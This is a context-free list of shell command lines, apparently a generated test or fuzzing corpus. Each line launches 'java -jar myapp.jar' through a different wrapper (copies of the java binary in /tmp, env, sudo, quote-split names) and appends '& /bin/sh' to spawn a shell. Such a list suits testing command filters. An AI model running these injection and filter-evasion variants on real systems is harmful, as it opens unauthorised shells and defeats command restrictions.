cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_60 && /tmp/tmp_bin_60 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_61 && /tmp/tmp_bin_61 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_62 && /tmp/tmp_bin_62 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_63 && /tmp/tmp_bin_63 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_64 && /tmp/tmp_bin_64 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_65 && /tmp/tmp_bin_65 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_66 && /tmp/tmp_bin_66 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_67 && /tmp/tmp_bin_67 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_68 && /tmp/tmp_bin_68 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_69 && /tmp/tmp_bin_69 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_7 && /tmp/tmp_bin_7 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_70 && /tmp/tmp_bin_70 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_71 && /tmp/tmp_bin_71 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_72 && /tmp/tmp_bin_72 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_73 && /tmp/tmp_bin_73 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_74 && /tmp/tmp_bin_74 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_75 && /tmp/tmp_bin_75 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_76 && /tmp/tmp_bin_76 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_77 && /tmp/tmp_bin_77 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_78 && /tmp/tmp_bin_78 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_79 && /tmp/tmp_bin_79 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_8 && /tmp/tmp_bin_8 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_80 && /tmp/tmp_bin_80 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_81 && /tmp/tmp_bin_81 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_82 && /tmp/tmp_bin_82 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_83 && /tmp/tmp_bin_83 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_84 && /tmp/tmp_bin_84 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_85 && /tmp/tmp_bin_85 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_86 && /tmp/tmp_bin_86 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_87 && /tmp/tmp_bin_87 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_88 && /tmp/tmp_bin_88 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_89 && /tmp/tmp_bin_89 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_9 && /tmp/tmp_bin_9 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_90 && /tmp/tmp_bin_90 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_91 && /tmp/tmp_bin_91 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_92 && /tmp/tmp_bin_92 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_93 && /tmp/tmp_bin_93 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_94 && /tmp/tmp_bin_94 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_95 && /tmp/tmp_bin_95 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_96 && /tmp/tmp_bin_96 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_97 && /tmp/tmp_bin_97 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_98 && /tmp/tmp_bin_98 -jar myapp.jar & /bin/sh
cp $(which java 2>/dev/null || echo java) /tmp/tmp_bin_99 && /tmp/tmp_bin_99 -jar myapp.jar & /bin/sh
env "java"  -jar myapp.jar & /bin/sh
env "java" -jar myapp.jar & /bin/sh
env "java"-jar myapp.jar & /bin/sh
env 'java'  -jar myapp.jar & /bin/sh
env 'java' -jar myapp.jar & /bin/sh
env 'java'-jar myapp.jar & /bin/sh
env -i "java"  -jar myapp.jar & /bin/sh
env -i "java" -jar myapp.jar & /bin/sh
env -i "java"-jar myapp.jar & /bin/sh
env -i 'java'  -jar myapp.jar & /bin/sh
env -i 'java' -jar myapp.jar & /bin/sh
env -i 'java'-jar myapp.jar & /bin/sh
env -i j""ava  -jar myapp.jar & /bin/sh
env -i j""ava -jar myapp.jar & /bin/sh
env -i j""ava-jar myapp.jar & /bin/sh
env -i j''ava  -jar myapp.jar & /bin/sh
env -i j''ava -jar myapp.jar & /bin/sh
env -i j''ava-jar myapp.jar & /bin/sh
env -i java  -jar myapp.jar & /bin/sh
env -i java -jar myapp.jar & /bin/sh
env -i java-jar myapp.jar & /bin/sh
env j""ava  -jar myapp.jar & /bin/sh
env j""ava -jar myapp.jar & /bin/sh
env j""ava-jar myapp.jar & /bin/sh
env j''ava  -jar myapp.jar & /bin/sh
env j''ava -jar myapp.jar & /bin/sh
env j''ava-jar myapp.jar & /bin/sh
env java  -jar myapp.jar & /bin/sh
env java -jar myapp.jar & /bin/sh
env java-jar myapp.jar & /bin/sh
j""ava  -jar myapp.jar & /bin/sh
j""ava -jar myapp.jar & /bin/sh
j""ava-jar myapp.jar & /bin/sh
j''ava  -jar myapp.jar & /bin/sh
j''ava -jar myapp.jar & /bin/sh
j''ava-jar myapp.jar & /bin/sh
java  -jar myapp.jar & /bin/sh
java -jar myapp.jar & /bin/sh
java-jar myapp.jar & /bin/sh
sudo "java"  -jar myapp.jar & /bin/sh
sudo "java" -jar myapp.jar & /bin/sh
sudo "java"-jar myapp.jar & /bin/sh
sudo 'java'  -jar myapp.jar & /bin/sh
sudo 'java' -jar myapp.jar & /bin/sh
sudo 'java'-jar myapp.jar & /bin/sh
sudo j""ava  -jar myapp.jar & /bin/sh
sudo j""ava -jar myapp.jar & /bin/sh
sudo j""ava-jar myapp.jar & /bin/sh
sudo j''ava  -jar myapp.jar & /bin/sh
sudo j''ava -jar myapp.jar & /bin/sh
sudo j''ava-jar myapp.jar & /bin/sh
sudo java  -jar myapp.jar & /bin/sh
sudo java -jar myapp.jar & /bin/sh
sudo java-jar myapp.jar & /bin/sh
